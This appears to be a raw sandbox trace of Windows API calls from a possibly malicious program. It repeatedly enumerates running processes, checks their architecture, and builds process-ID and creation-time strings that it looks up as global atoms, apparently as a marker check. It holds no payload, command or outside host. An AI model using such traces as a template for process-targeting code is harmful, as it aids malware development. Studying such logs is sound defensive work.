	[0105.282] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.282] CloseHandle (hObject=0x694) returned 1
	[0105.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.283] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.283] CloseHandle (hObject=0x694) returned 1
	[0105.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.283] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.283] CloseHandle (hObject=0x694) returned 1
	[0105.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.283] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.283] CloseHandle (hObject=0x694) returned 1
	[0105.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.283] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.283] CloseHandle (hObject=0x694) returned 1
	[0105.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.284] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.284] CloseHandle (hObject=0x694) returned 1
	[0105.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.284] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.284] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.284] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.284] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.285] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.285] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.285] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.285] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.285] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.285] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.286] CloseHandle (hObject=0x694) returned 1
	[0105.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.286] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.286] CloseHandle (hObject=0x694) returned 1
	[0105.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.286] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.286] CloseHandle (hObject=0x694) returned 1
	[0105.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.286] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.286] CloseHandle (hObject=0x694) returned 1
	[0105.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.327] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.327] CloseHandle (hObject=0x694) returned 1
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.327] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.328] CloseHandle (hObject=0x694) returned 1
	[0105.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.328] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.328] CloseHandle (hObject=0x694) returned 1
	[0105.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.328] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.328] CloseHandle (hObject=0x694) returned 1
	[0105.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.328] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.328] CloseHandle (hObject=0x694) returned 1
	[0105.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.328] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.328] CloseHandle (hObject=0x694) returned 1
	[0105.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.329] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.329] CloseHandle (hObject=0x694) returned 1
	[0105.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.329] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.329] CloseHandle (hObject=0x694) returned 1
	[0105.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.329] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.329] CloseHandle (hObject=0x694) returned 1
	[0105.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.330] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.330] CloseHandle (hObject=0x694) returned 1
	[0105.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.330] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.330] CloseHandle (hObject=0x694) returned 1
	[0105.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.330] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.330] CloseHandle (hObject=0x694) returned 1
	[0105.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.330] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.330] CloseHandle (hObject=0x694) returned 1
	[0105.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.331] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.331] CloseHandle (hObject=0x694) returned 1
	[0105.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.331] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.331] CloseHandle (hObject=0x694) returned 1
	[0105.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.331] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.331] CloseHandle (hObject=0x694) returned 1
	[0105.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.331] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.331] CloseHandle (hObject=0x694) returned 1
	[0105.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.332] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.332] CloseHandle (hObject=0x694) returned 1
	[0105.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.332] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.332] CloseHandle (hObject=0x694) returned 1
	[0105.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.332] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.332] CloseHandle (hObject=0x694) returned 1
	[0105.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.332] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.332] CloseHandle (hObject=0x694) returned 1
	[0105.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.333] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.333] CloseHandle (hObject=0x694) returned 1
	[0105.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.333] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.333] CloseHandle (hObject=0x694) returned 1
	[0105.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.333] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.333] CloseHandle (hObject=0x694) returned 1
	[0105.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.333] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.333] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.334] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.334] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.334] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.334] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.334] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.334] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.334] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.334] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.334] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.334] CloseHandle (hObject=0x694) returned 1
	[0105.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.335] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.335] CloseHandle (hObject=0x694) returned 1
	[0105.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.335] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.335] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0105.335] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0105.335] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0105.336] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.336] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0105.336] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.336] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0105.336] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0105.336] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0105.336] CloseHandle (hObject=0x694) returned 1
	[0105.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0105.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0105.336] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.336] CloseHandle (hObject=0x694) returned 1
	[0105.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0105.337] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.337] CloseHandle (hObject=0x694) returned 1
	[0105.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0105.337] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.337] CloseHandle (hObject=0x694) returned 1
	[0105.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0105.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0105.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0105.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0105.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0105.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0105.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0105.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0105.382] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.383] CloseHandle (hObject=0x694) returned 1
	[0105.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0105.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0105.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0105.383] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.383] CloseHandle (hObject=0x694) returned 1
	[0105.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0105.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0105.383] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.383] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0105.384] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.384] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0105.384] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.384] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0105.384] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.384] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0105.384] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.384] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0105.384] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.384] CloseHandle (hObject=0x694) returned 1
	[0105.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0105.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0105.385] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.385] CloseHandle (hObject=0x694) returned 1
	[0105.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0105.385] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.385] CloseHandle (hObject=0x694) returned 1
	[0105.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0105.385] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.385] CloseHandle (hObject=0x694) returned 1
	[0105.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0105.385] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.385] CloseHandle (hObject=0x694) returned 1
	[0105.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0105.385] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0105.386] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0105.386] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0105.386] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0105.386] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0105.386] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.386] CloseHandle (hObject=0x694) returned 1
	[0105.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0105.387] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.387] CloseHandle (hObject=0x694) returned 1
	[0105.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0105.387] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.387] CloseHandle (hObject=0x694) returned 1
	[0105.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0105.387] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.387] CloseHandle (hObject=0x694) returned 1
	[0105.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0105.387] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.387] CloseHandle (hObject=0x694) returned 1
	[0105.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0105.387] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.387] CloseHandle (hObject=0x694) returned 1
	[0105.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0105.388] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.388] CloseHandle (hObject=0x694) returned 1
	[0105.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0105.388] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.388] CloseHandle (hObject=0x694) returned 1
	[0105.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0105.388] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.388] CloseHandle (hObject=0x694) returned 1
	[0105.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0105.388] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.388] CloseHandle (hObject=0x694) returned 1
	[0105.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0105.388] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.388] CloseHandle (hObject=0x694) returned 1
	[0105.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0105.389] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.389] CloseHandle (hObject=0x694) returned 1
	[0105.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0105.389] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.389] CloseHandle (hObject=0x694) returned 1
	[0105.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.389] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0105.389] CloseHandle (hObject=0x694) returned 1
	[0105.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0105.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0105.390] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
